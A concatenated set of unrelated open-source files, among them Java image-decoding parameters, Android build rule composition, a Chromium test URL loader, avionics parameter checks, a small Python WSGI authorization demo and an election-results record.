":" + AndroidBuckRuleComposer.keystore(target)));
}
return rules;
}
private static List<Rule> createRules(AndroidAppTarget target) {
return createRules(target, new ArrayList<>(), new ArrayList<>());
}
private static List<Rule> createRules(
AndroidAppInstrumentationTarget target,
AndroidAppTarget mainApkTarget,
List<Rule> mainApkTargetRules) {
List<Rule> libRules =
createRules(
target,
null,
filterAndroidDepRules(mainApkTargetRules),
filterAndroidResDepRules(mainApkTargetRules));
List<Rule> rules = new ArrayList<>(libRules);
Rule testAppManifest = ManifestRuleComposer.composeForBinary(target);
rules.add(testAppManifest);
rules.add(
AndroidInstrumentationApkRuleComposer.compose(
filterAndroidDepRules(rules), mainApkTarget, testAppManifest.buckName()));
rules.add(AndroidInstrumentationTestRuleComposer.compose(mainApkTarget));
return rules;
}
private static List<Rule> createRules(
AndroidLibInstrumentationTarget target, List<Rule> mainLibTargetRules) {
return new ArrayList<>(
createRules(
target,
filterAndroidDepRules(mainLibTargetRules),
filterAndroidResDepRules(mainLibTargetRules)));
}
// android rules now accept only other android rules as deps, and okbuck_android_module
// macro infers what resources rules to depend on
private static List<String> filterAndroidDepRules(List<Rule> rules) {
return rules
.stream()
.filter(rule -> rule instanceof AndroidRule || rule instanceof AndroidModuleRule)
.map(Rule::buckName)
.collect(Collectors.toList());
}
// Same logic as above, so to get the actual resource rule, we derive from the src one
private static List<String> filterAndroidResDepRules(List<Rule> rules) {
return rules
.stream()
.filter(rule -> rule instanceof AndroidRule || rule instanceof AndroidModuleRule)
.map(Rule::buckName)
.map(ruleName -> ruleName.replace(":src_", ":res_"))
.collect(Collectors.toList());
}
}
| 4,771 |
662 | package io.crossbar.autobahn.websocket.messages;
/// An exception occured in the WS reader or WS writer.
public class Error extends Message {
public Exception mException;
public Error(Exception e) {
mException = e;
}
}
| 80 |
543 | /*
* Copyright (c) 1999, 2014, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package javax.imageio;
import java.awt.Dimension;
import java.awt.image.BufferedImage;
/**
* A class describing how a stream is to be decoded. Instances of
* this class or its subclasses are used to supply prescriptive
* "how-to" information to instances of {@code ImageReader}.
*
* <p> An image encoded as part of a file or stream may be thought of
* extending out in multiple dimensions: the spatial dimensions of
* width and height, a number of bands, and a number of progressive
* decoding passes. This class allows a contiguous (hyper)rectangular
* subarea of the image in all of these dimensions to be selected for
* decoding. Additionally, the spatial dimensions may be subsampled
* discontinuously. Finally, color and format conversions may be
* specified by controlling the {@code ColorModel} and
* {@code SampleModel} of the destination image, either by
* providing a {@code BufferedImage} or by using an
* {@code ImageTypeSpecifier}.
*
* <p> An {@code ImageReadParam} object is used to specify how an
* image, or a set of images, will be converted on input from
* a stream in the context of the Java Image I/O framework. A plug-in for a
* specific image format will return instances of
* {@code ImageReadParam} from the
* {@code getDefaultReadParam} method of its
* {@code ImageReader} implementation.
*
* <p> The state maintained by an instance of
* {@code ImageReadParam} is independent of any particular image
* being decoded. When actual decoding takes place, the values set in
* the read param are combined with the actual properties of the image
* being decoded from the stream and the destination
* {@code BufferedImage} that will receive the decoded pixel
* data. For example, the source region set using
* {@code setSourceRegion} will first be intersected with the
* actual valid source area. The result will be translated by the
* value returned by {@code getDestinationOffset}, and the
* resulting rectangle intersected with the actual valid destination
* area to yield the destination area that will be written.
*
* <p> The parameters specified by an {@code ImageReadParam} are
* applied to an image as follows. First, if a rendering size has
* been set by {@code setSourceRenderSize}, the entire decoded
* image is rendered at the size given by
* {@code getSourceRenderSize}. Otherwise, the image has its
* natural size given by {@code ImageReader.getWidth} and
* {@code ImageReader.getHeight}.
*
* <p> Next, the image is clipped against the source region
* specified by {@code getSourceXOffset}, {@code getSourceYOffset},
* {@code getSourceWidth}, and {@code getSourceHeight}.
*
* <p> The resulting region is then subsampled according to the
* factors given in {@link IIOParam#setSourceSubsampling
* IIOParam.setSourceSubsampling}. The first pixel,
* the number of pixels per row, and the number of rows all depend
* on the subsampling settings.
* Call the minimum X and Y coordinates of the resulting rectangle
* ({@code minX}, {@code minY}), its width {@code w}
* and its height {@code h}.
*
* <p> This rectangle is offset by
* ({@code getDestinationOffset().x},
* {@code getDestinationOffset().y}) and clipped against the
* destination bounds. If no destination image has been set, the
* destination is defined to have a width of
* {@code getDestinationOffset().x} + {@code w}, and a
* height of {@code getDestinationOffset().y} + {@code h} so
* that all pixels of the source region may be written to the
* destination.
*
* <p> Pixels that land, after subsampling, within the destination
* image, and that are written in one of the progressive passes
* specified by {@code getSourceMinProgressivePass} and
* {@code getSourceNumProgressivePasses} are passed along to the
* next step.
*
* <p> Finally, the source samples of each pixel are mapped into
* destination bands according to the algorithm described in the
* comment for {@code setDestinationBands}.
*
* <p> Plug-in writers may extend the functionality of
* {@code ImageReadParam} by providing a subclass that implements
* additional, plug-in specific interfaces. It is up to the plug-in
* to document what interfaces are available and how they are to be
* used. Readers will silently ignore any extended features of an
* {@code ImageReadParam} subclass of which they are not aware.
* Also, they may ignore any optional features that they normally
* disable when creating their own {@code ImageReadParam}
* instances via {@code getDefaultReadParam}.
*
* <p> Note that unless a query method exists for a capability, it must
* be supported by all {@code ImageReader} implementations
* (<i>e.g.</i> source render size is optional, but subsampling must be
* supported).
*
*
* @see ImageReader
* @see ImageWriter
* @see ImageWriteParam
*/
public class ImageReadParam extends IIOParam {
/**
* {@code true} if this {@code ImageReadParam} allows
* the source rendering dimensions to be set. By default, the
* value is {@code false}. Subclasses must set this value
* manually.
*
* <p> {@code ImageReader}s that do not support setting of
* the source render size should set this value to
* {@code false}.
*/
protected boolean canSetSourceRenderSize = false;
/**
* The desired rendering width and height of the source, if
* {@code canSetSourceRenderSize} is {@code true}, or
* {@code null}.
*
* <p> {@code ImageReader}s that do not support setting of
* the source render size may ignore this value.
*/
protected Dimension sourceRenderSize = null;
/**
* The current destination {@code BufferedImage}, or
* {@code null} if none has been set. By default, the value
* is {@code null}.
*/
protected BufferedImage destination = null;
/**
* The set of destination bands to be used, as an array of
* {@code int}s. By default, the value is {@code null},
* indicating all destination bands should be written in order.
*/
protected int[] destinationBands = null;
/**
* The minimum index of a progressive pass to read from the
* source. By default, the value is set to 0, which indicates
* that passes starting with the first available pass should be
* decoded.
*
* <p> Subclasses should ensure that this value is
* non-negative.
*/
protected int minProgressivePass = 0;
/**
* The maximum number of progressive passes to read from the
* source. By default, the value is set to
* {@code Integer.MAX_VALUE}, which indicates that passes up
* to and including the last available pass should be decoded.
*
* <p> Subclasses should ensure that this value is positive.
* Additionally, if the value is not
* {@code Integer.MAX_VALUE}, then
* {@code minProgressivePass + numProgressivePasses - 1}
* should not exceed
* {@code Integer.MAX_VALUE}.
*/
protected int numProgressivePasses = Integer.MAX_VALUE;
/**
* Constructs an {@code ImageReadParam}.
*/
public ImageReadParam() {}
// Comment inherited
public void setDestinationType(ImageTypeSpecifier destinationType) {
super.setDestinationType(destinationType);
setDestination(null);
}
/**
* Supplies a {@code BufferedImage} to be used as the
* destination for decoded pixel data. The currently set image
* will be written to by the {@code read},
* {@code readAll}, and {@code readRaster} methods, and
* a reference to it will be returned by those methods.
*
* <p> Pixel data from the aforementioned methods will be written
* starting at the offset specified by
* {@code getDestinationOffset}.
*
* <p> If {@code destination} is {@code null}, a
* newly-created {@code BufferedImage} will be returned by
* those methods.
*
* <p> At the time of reading, the image is checked to verify that
* its {@code ColorModel} and {@code SampleModel}
* correspond to one of the {@code ImageTypeSpecifier}s
* returned from the {@code ImageReader}'s
* {@code getImageTypes} method. If it does not, the reader
* will throw an {@code IIOException}.
*
* @param destination the BufferedImage to be written to, or
* {@code null}.
*
* @see #getDestination
*/
public void setDestination(BufferedImage destination) {
this.destination = destination;
}
/**
* Returns the {@code BufferedImage} currently set by the
* {@code setDestination} method, or {@code null}
* if none is set.
*
* @return the BufferedImage to be written to.
*
* @see #setDestination
*/
public BufferedImage getDestination() {
return destination;
}
/**
* Sets the indices of the destination bands where data
* will be placed. Duplicate indices are not allowed.
*
* <p> A {@code null} value indicates that all destination
* bands will be used.
*
* <p> Choosing a destination band subset will not affect the
* number of bands in the output image of a read if no destination
* image is specified; the created destination image will still
* have the same number of bands as if this method had never been
* called. If a different number of bands in the destination
* image is desired, an image must be supplied using the
* {@code ImageReadParam.setDestination} method.
*
* <p> At the time of reading or writing, an
* {@code IllegalArgumentException} will be thrown by the
* reader or writer if a value larger than the largest destination
* band index has been specified, or if the number of source bands
* and destination bands to be used differ. The
* {@code ImageReader.checkReadParamBandSettings} method may
* be used to automate this test.
*
* @param destinationBands an array of integer band indices to be
* used.
*
* @exception IllegalArgumentException if {@code destinationBands}
* contains a negative or duplicate value.
*
* @see #getDestinationBands
* @see #getSourceBands
* @see ImageReader#checkReadParamBandSettings
*/
public void setDestinationBands(int[] destinationBands) {
if (destinationBands == null) {
this.destinationBands = null;
} else {
int numBands = destinationBands.length;
for (int i = 0; i < numBands; i++) {
int band = destinationBands[i];
if (band < 0) {
throw new IllegalArgumentException("Band value < 0!");
}
for (int j = i + 1; j < numBands; j++) {
if (band == destinationBands[j]) {
throw new IllegalArgumentException("Duplicate band value!");
}
}
}
this.destinationBands = destinationBands.clone();
}
}
/**
* Returns the set of band indices where data will be placed.
* If no value has been set, {@code null} is returned to
* indicate that all destination bands will be used.
*
* @return the indices of the destination bands to be used,
* or {@code null}.
*
* @see #setDestinationBands
*/
public int[] getDestinationBands() {
if (destinationBands == null) {
return null;
} else {
return destinationBands.clone();
}
}
/**
* Returns {@code true} if this reader allows the source
* image to be rendered at an arbitrary size as part of the
* decoding process, by means of the
* {@code setSourceRenderSize} method. If this method
* returns {@code false}, calls to
* {@code setSourceRenderSize} will throw an
* {@code UnsupportedOperationException}.
*
* @return {@code true} if setting source rendering size is
* supported.
*
* @see #setSourceRenderSize
*/
public boolean canSetSourceRenderSize() {
return canSetSourceRenderSize;
}
/**
* If the image is able to be rendered at an arbitrary size, sets
* the source width and height to the supplied values. Note that
* the values returned from the {@code getWidth} and
* {@code getHeight} methods on {@code ImageReader} are
* not affected by this method; they will continue to return the
* default size for the image. Similarly, if the image is also
* tiled the tile width and height are given in terms of the default
* size.
*
* <p> Typically, the width and height should be chosen such that
* the ratio of width to height closely approximates the aspect
* ratio of the image, as returned from
* {@code ImageReader.getAspectRatio}.
*
* <p> If this plug-in does not allow the rendering size to be
* set, an {@code UnsupportedOperationException} will be
* thrown.
*
* <p> To remove the render size setting, pass in a value of
* {@code null} for {@code size}.
*
* @param size a {@code Dimension} indicating the desired
* width and height.
*
* @exception IllegalArgumentException if either the width or the
* height is negative or 0.
* @exception UnsupportedOperationException if image resizing
* is not supported by this plug-in.
*
* @see #getSourceRenderSize
* @see ImageReader#getWidth
* @see ImageReader#getHeight
* @see ImageReader#getAspectRatio
*/
public void setSourceRenderSize(Dimension size)
throws UnsupportedOperationException {
if (!canSetSourceRenderSize()) {
throw new UnsupportedOperationException
("Can't set source render size!");
}
if (size == null) {
this.sourceRenderSize = null;
} else {
if (size.width <= 0 || size.height <= 0) {
throw new IllegalArgumentException("width or height <= 0!");
}
this.sourceRenderSize = (Dimension)size.clone();
}
}
/**
* Returns the width and height of the source image as it
* will be rendered during decoding, if they have been set via the
* {@code setSourceRenderSize} method. A
* {@code null} value indicates that no setting has been made.
*
* @return the rendered width and height of the source image
* as a {@code Dimension}.
*
* @see #setSourceRenderSize
*/
public Dimension getSourceRenderSize() {
return (sourceRenderSize == null) ?
null : (Dimension)sourceRenderSize.clone();
}
/**
* Sets the range of progressive passes that will be decoded.
* Passes outside of this range will be ignored.
*
* <p> A progressive pass is a re-encoding of the entire image,
* generally at progressively higher effective resolutions, but
* requiring greater transmission bandwidth. The most common use
* of progressive encoding is found in the JPEG format, where
* successive passes include more detailed representations of the
* high-frequency image content.
*
* <p> The actual number of passes to be decoded is determined
* during decoding, based on the number of actual passes available
* in the stream. Thus if {@code minPass + numPasses - 1} is
* larger than the index of the last available passes, decoding
* will end with that pass.
*
* <p> A value of {@code numPasses} of
* {@code Integer.MAX_VALUE} indicates that all passes from
* {@code minPass} forward should be read. Otherwise, the
* index of the last pass (<i>i.e.</i>, {@code minPass + numPasses - 1})
* must not exceed {@code Integer.MAX_VALUE}.
*
* <p> There is no {@code unsetSourceProgressivePasses}
* method; the same effect may be obtained by calling
* {@code setSourceProgressivePasses(0, Integer.MAX_VALUE)}.
*
* @param minPass the index of the first pass to be decoded.
* @param numPasses the maximum number of passes to be decoded.
*
* @exception IllegalArgumentException if {@code minPass} is
* negative, {@code numPasses} is negative or 0, or
* {@code numPasses} is smaller than
* {@code Integer.MAX_VALUE} but
* {@code minPass + numPasses - 1} is greater than
* {@code INTEGER.MAX_VALUE}.
*
* @see #getSourceMinProgressivePass
* @see #getSourceMaxProgressivePass
*/
public void setSourceProgressivePasses(int minPass, int numPasses) {
if (minPass < 0) {
throw new IllegalArgumentException("minPass < 0!");
}
if (numPasses <= 0) {
throw new IllegalArgumentException("numPasses <= 0!");
}
if ((numPasses != Integer.MAX_VALUE) &&
(((minPass + numPasses - 1) & 0x80000000) != 0)) {
throw new IllegalArgumentException
("minPass + numPasses - 1 > INTEGER.MAX_VALUE!");
}
this.minProgressivePass = minPass;
this.numProgressivePasses = numPasses;
}
/**
* Returns the index of the first progressive pass that will be
* decoded. If no value has been set, 0 will be returned (which is
* the correct value).
*
* @return the index of the first pass that will be decoded.
*
* @see #setSourceProgressivePasses
* @see #getSourceNumProgressivePasses
*/
public int getSourceMinProgressivePass() {
return minProgressivePass;
}
/**
* If {@code getSourceNumProgressivePasses} is equal to
* {@code Integer.MAX_VALUE}, returns
* {@code Integer.MAX_VALUE}. Otherwise, returns
* {@code getSourceMinProgressivePass() +
* getSourceNumProgressivePasses() - 1}.
*
* @return the index of the last pass to be read, or
* {@code Integer.MAX_VALUE}.
*/
public int getSourceMaxProgressivePass() {
if (numProgressivePasses == Integer.MAX_VALUE) {
return Integer.MAX_VALUE;
} else {
return minProgressivePass + numProgressivePasses - 1;
}
}
/**
* Returns the number of the progressive passes that will be
* decoded. If no value has been set,
* {@code Integer.MAX_VALUE} will be returned (which is the
* correct value).
*
* @return the number of the passes that will be decoded.
*
* @see #setSourceProgressivePasses
* @see #getSourceMinProgressivePass
*/
public int getSourceNumProgressivePasses() {
return numProgressivePasses;
}
}
| 6,722 |
348 | {"nom":"Moumour","circ":"4ème circonscription","dpt":"Pyrénées-Atlantiques","inscrits":632,"abs":316,"votants":316,"blancs":22,"nuls":11,"exp":283,"res":[{"nuance":"DVD","nom":"<NAME>","voix":147},{"nuance":"REM","nom":"<NAME>","voix":136}]} | 97 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.java.hints;
import org.netbeans.junit.NbTestCase;
import org.netbeans.modules.java.hints.test.api.HintTest;
/**
*
* @author <NAME>
*/
public class StaticNonFinalUsedInInitializationTest extends NbTestCase {
public StaticNonFinalUsedInInitializationTest(String name) {
super(name);
}
public void testDoNotReport() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" private static final int A = 5;\n" +
" public static final int B = A + 10;\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings();
}
public void testDoNotReport2() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" private static int A = 5;\n" +
" public int B = A + 10;\n" +
" public int C;\n" +
" {\n" +
" C = A + 10;" +
" }\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings();
}
public void testReportIt() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" static int A = 5;\n" +
" static int B = A + 10;\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings("3:19-3:20:verifier:StaticNonFinalUsedInInitialization");
}
public void testReportIt2() throws Exception {
HintTest
.create()
.input("package test;\n" +
"public class Test {\n" +
" static int A = 5;\n" +
" static int B;\n" +
" static {\n" +
" B = A + 10;\n" +
" }\n" +
"}")
.run(StaticNonFinalUsedInInitialization.class)
.assertWarnings("5:12-5:13:verifier:StaticNonFinalUsedInInitialization");
}
}
| 1,632 |
1,178 | /*
* Copyright 2020 Makani Technologies LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "avionics/firmware/params/common.h"
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include "avionics/common/crc.h"
#include "avionics/firmware/params/param_header.h"
static const ParamHeader *GetParamHeader(const void *section_data) {
return (const ParamHeader *)section_data;
}
static const uint8_t *GetParamData(const void *section_data) {
return (const uint8_t*)section_data + sizeof(ParamHeader);
}
static int32_t GetParamDataMaxSize(int32_t section_size) {
return section_size - sizeof(ParamHeader);
}
static bool VerifyParamHeader(const ParamHeader *header, int32_t max_size,
const uint8_t *data) {
if (header->param_format_version != kParamHeaderVersionCurrent)
return false;
if (header->data_length > max_size)
return false;
if (header->data_crc != Crc32(0U, header->data_length, data))
return false;
return true;
}
const void *GetParams(int32_t section_size, const void *section_data,
uint32_t *version_number) {
const ParamHeader *header = GetParamHeader(section_data);
const uint8_t *data = GetParamData(section_data);
int32_t max_size = GetParamDataMaxSize(section_size);
if (!VerifyParamHeader(header, max_size, data)) {
return NULL;
}
*version_number = header->version_number;
return data;
}
| 653 |
2,151 | <gh_stars>1000+
// Copyright (c) 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "content/test/test_navigation_url_loader.h"
#include <utility>
#include "content/browser/loader/navigation_url_loader_delegate.h"
#include "content/common/navigation_subresource_loader_params.h"
#include "content/public/browser/global_request_id.h"
#include "content/public/browser/navigation_data.h"
#include "content/public/browser/render_frame_host.h"
#include "content/public/browser/render_process_host.h"
#include "content/public/browser/ssl_status.h"
#include "content/public/browser/web_contents.h"
#include "content/public/common/browser_side_navigation_policy.h"
#include "net/url_request/redirect_info.h"
#include "services/network/public/cpp/resource_response.h"
#include "services/network/public/mojom/url_loader_factory.mojom.h"
namespace content {
TestNavigationURLLoader::TestNavigationURLLoader(
std::unique_ptr<NavigationRequestInfo> request_info,
NavigationURLLoaderDelegate* delegate)
: request_info_(std::move(request_info)),
delegate_(delegate),
redirect_count_(0),
response_proceeded_(false) {
DCHECK(IsBrowserSideNavigationEnabled());
}
void TestNavigationURLLoader::FollowRedirect() {
redirect_count_++;
}
void TestNavigationURLLoader::ProceedWithResponse() {
response_proceeded_ = true;
}
void TestNavigationURLLoader::SimulateServerRedirect(const GURL& redirect_url) {
net::RedirectInfo redirect_info;
redirect_info.status_code = 302;
redirect_info.new_method = "GET";
redirect_info.new_url = redirect_url;
redirect_info.new_site_for_cookies = redirect_url;
scoped_refptr<network::ResourceResponse> response(
new network::ResourceResponse);
CallOnRequestRedirected(redirect_info, response);
}
void TestNavigationURLLoader::SimulateError(int error_code) {
delegate_->OnRequestFailed(network::URLLoaderCompletionStatus(error_code));
}
void TestNavigationURLLoader::CallOnRequestRedirected(
const net::RedirectInfo& redirect_info,
const scoped_refptr<network::ResourceResponse>& response) {
delegate_->OnRequestRedirected(redirect_info, response);
}
void TestNavigationURLLoader::CallOnResponseStarted(
const scoped_refptr<network::ResourceResponse>& response,
std::unique_ptr<NavigationData> navigation_data) {
// Start the request_ids at 1000 to avoid collisions with request ids from
// network resources (it should be rare to compare these in unit tests).
static int request_id = 1000;
int child_id =
WebContents::FromFrameTreeNodeId(request_info_->frame_tree_node_id)
->GetMainFrame()
->GetProcess()
->GetID();
GlobalRequestID global_id(child_id, ++request_id);
// Create a bidirectionnal communication pipe between a URLLoader and a
// URLLoaderClient. It will be closed at the end of this function. The sole
// purpose of this is not to violate some DCHECKs when the navigation commits.
network::mojom::URLLoaderClientPtr url_loader_client_ptr;
network::mojom::URLLoaderClientRequest url_loader_client_request =
mojo::MakeRequest(&url_loader_client_ptr);
network::mojom::URLLoaderPtr url_loader_ptr;
network::mojom::URLLoaderRequest url_loader_request =
mojo::MakeRequest(&url_loader_ptr);
auto url_loader_client_endpoints =
network::mojom::URLLoaderClientEndpoints::New(
url_loader_ptr.PassInterface(), std::move(url_loader_client_request));
delegate_->OnResponseStarted(response, std::move(url_loader_client_endpoints),
std::move(navigation_data), global_id, false,
false, base::nullopt);
}
TestNavigationURLLoader::~TestNavigationURLLoader() {}
} // namespace content
| 1,330 |
4,538 | <reponame>wanguojian/AliOS-Things<filename>platform/mcu/haas1000/drivers/services/bt_app/app_spp.h
/*
* Copyright (C) 2015-2020 Alibaba Group Holding Limited
*/
#ifndef __APP_SPP_H__
#define __APP_SPP_H__
#include "spp_api.h"
#include "sdp_api.h"
#ifdef __cplusplus
extern "C" {
#endif
#if defined(__3M_PACK__)
#define L2CAP_MTU 980
#else
#define L2CAP_MTU 672
#endif
#define SPP_RECV_BUFFER_SIZE 3072
#define SPP_MAX_DATA_PACKET_SIZE L2CAP_MTU
#ifdef ENHANCED_STACK
#define BTIF_APP_SPP_SERVER_GSOUND_CTL_ID BTIF_APP_SPP_SERVER_ID_1
#define BTIF_APP_SPP_SERVER_GSOUND_AUD_ID BTIF_APP_SPP_SERVER_ID_2
#define BTIF_APP_SPP_SERVER_TOTAD_ID BTIF_APP_SPP_SERVER_ID_3
#define BTIF_APP_SPP_SERVER_BES_OTA_ID BTIF_APP_SPP_SERVER_ID_4
#define BTIF_APP_SPP_SERVER_AI_VOICE_ID BTIF_APP_SPP_SERVER_ID_5
#define BTIF_APP_SPP_SERVER_GREEN_ID BTIF_APP_SPP_SERVER_ID_6
#define BTIF_APP_SPP_SERVER_RED_ID BTIF_APP_SPP_SERVER_ID_7
#define BTIF_APP_SPP_SERVER_FP_RFCOMM_ID BTIF_APP_SPP_SERVER_ID_8
#define BTIF_APP_SPP_CLIENT_AI_VOICE_ID BTIF_APP_SPP_CLIENT_ID_1
#define BTIF_APP_SPP_CLIENT_CCMP_ID BTIF_APP_SPP_CLIENT_ID_2
#define BTIF_APP_SPP_CLIENT_RED_ID BTIF_APP_SPP_CLIENT_ID_3
/*---------------------------------------------------------------------------
* rfcomm channel number
* should be from 1 to 30
*/
enum RFCOMM_CHANNEL_NUM {
RFCOMM_CHANNEL_GS_CONTROL = RFCOMM_CHANNEL_1,
RFCOMM_CHANNEL_GS_AUDIO = RFCOMM_CHANNEL_2,
RFCOMM_CHANNEL_TOTA = RFCOMM_CHANNEL_3,
RFCOMM_CHANNEL_BES_OTA = RFCOMM_CHANNEL_4,
RFCOMM_CHANNEL_AI_VOICE = RFCOMM_CHANNEL_5,
RFCOMM_CHANNEL_GREEN = RFCOMM_CHANNEL_6,
RFCOMM_CHANNEL_RED = RFCOMM_CHANNEL_7,
RFCOMM_CHANNEL_FP = RFCOMM_CHANNEL_8,
};
#endif
struct spp_device *app_create_spp_device(void);
#if 0
void app_spp_register_connect_callback(struct spp_device *osDev_t, spp_event_callback_t callback);
void app_spp_register_disconnect_callback(struct spp_device *osDev_t, spp_event_callback_t callback);
void app_spp_register_tx_done(struct spp_device *osDev_t, spp_event_callback_t callback);
#endif
bt_status_t app_spp_send_data(struct spp_device *osDev_t, uint8_t* ptrData, uint16_t *length);
void app_spp_open(struct spp_device *osDev_t, btif_remote_device_t *btDevice, btif_sdp_record_param_t *param, osMutexId mid, uint8_t service_id, spp_callback_t callback);
#ifdef __cplusplus
}
#endif
#endif
| 1,296 |
482 | <reponame>hginzel/Prana<filename>src/main/java/com/netflix/prana/http/api/AbstractRequestHandler.java
/*
* Copyright 2014 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.prana.http.api;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.netflix.prana.http.Context;
import com.netflix.prana.internal.DefaultContext;
import io.netty.buffer.ByteBuf;
import io.reactivex.netty.protocol.http.server.HttpServerRequest;
import io.reactivex.netty.protocol.http.server.HttpServerResponse;
import io.reactivex.netty.protocol.http.server.RequestHandler;
import rx.Observable;
public abstract class AbstractRequestHandler implements RequestHandler<ByteBuf, ByteBuf> {
private final ObjectMapper objectMapper;
protected AbstractRequestHandler(ObjectMapper objectMapper) {
this.objectMapper = objectMapper;
}
abstract Observable<Void> handle(Context context);
@Override
public Observable<Void> handle(HttpServerRequest<ByteBuf> request, final HttpServerResponse<ByteBuf> response) {
DefaultContext context = new DefaultContext(request, response, objectMapper);
return handle(context);
}
}
| 514 |
5,079 | <reponame>kokosing/hue
def tack_environ(environ, msg):
import pprint
penv = pprint.pformat(environ)
return msg + '\n\n' + penv
def deny(start_response, environ, msg):
ct = 'text/plain'
msg = tack_environ(environ, msg)
cl = str(len(msg))
start_response('401 Unauthorized',
[ ('Content-Type', ct),
('Content-Length', cl) ],
)
def allow(start_response, environ, msg):
ct = 'text/plain'
msg = tack_environ(environ, msg)
cl = str(len(msg))
start_response('200 OK',
[ ('Content-Type', ct),
('Content-Length', cl) ],
)
return [msg]
def app(environ, start_response):
path_info = environ['PATH_INFO']
remote_user = environ.get('REMOTE_USER')
if path_info.endswith('/shared'):
if not remote_user:
return deny(start_response, environ, 'You cant do that')
else:
return allow(start_response, environ,
'Welcome to the shared area, %s' % remote_user)
elif path_info.endswith('/admin'):
if remote_user != 'admin':
return deny(start_response, environ, 'Only admin can do that')
else:
return allow(start_response, environ, 'Hello, admin!')
elif path_info.endswith('/chris'):
if remote_user != 'chris':
return deny(start_response, environ, 'Only chris can do that')
else:
return allow(start_response, environ, 'Hello, chris!')
else:
return allow(start_response, environ, 'Unprotected page')
def make_app(global_config, **kw):
return app
| 834 |
1,420 | /*
*
* Copyright 2019 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package com.netflix.genie.agent.execution.process;
import com.netflix.genie.common.external.dtos.v4.JobStatus;
import lombok.EqualsAndHashCode;
import lombok.Getter;
import lombok.ToString;
/**
* A DTO POJO to capture final information about the job process this agent process was responsible for.
*
* @author tgianos
* @since 4.0.0
*/
@Getter
@EqualsAndHashCode(doNotUseGetters = true)
@ToString(doNotUseGetters = true)
@SuppressWarnings("FinalClass")
public class JobProcessResult {
private final JobStatus finalStatus;
private final String finalStatusMessage;
private final long stdOutSize;
private final long stdErrSize;
private final int exitCode;
private JobProcessResult(final Builder builder) {
this.finalStatus = builder.bFinalStatus;
this.finalStatusMessage = builder.bFinalStatusMessage;
this.stdOutSize = builder.bStdOutSize;
this.stdErrSize = builder.bStdErrSize;
this.exitCode = builder.bExitCode;
}
/**
* A builder to create valid, immutable {@link JobProcessResult} instances.
*
* @author tgianos
* @since 4.0.0
*/
public static class Builder {
private final JobStatus bFinalStatus;
private final String bFinalStatusMessage;
private final int bExitCode;
private long bStdOutSize;
private long bStdErrSize;
/**
* Constructor.
*
* @param finalStatus The final {@link JobStatus} for the job. {@link JobStatus#isFinished()} must return
* true
* @param finalStatusMessage The final human readable message for the job status
* @param exitCode The process exit code
* @throws IllegalArgumentException When {@literal finalStatus} is not a final status
*/
public Builder(
final JobStatus finalStatus,
final String finalStatusMessage,
final int exitCode
) throws IllegalArgumentException {
if (!finalStatus.isFinished()) {
throw new IllegalArgumentException(
"finalStatus must be one of the final states: "
+ JobStatus.getFinishedStatuses()
+ ". Was "
+ finalStatusMessage
);
}
this.bFinalStatus = finalStatus;
this.bFinalStatusMessage = finalStatusMessage;
this.bExitCode = exitCode;
}
/**
* Set the length of the std out file in bytes if there was one.
*
* @param stdOutSize The length of the std out file in bytes
* @return This builder object
*/
public Builder withStdOutSize(final long stdOutSize) {
this.bStdOutSize = Math.max(stdOutSize, 0L);
return this;
}
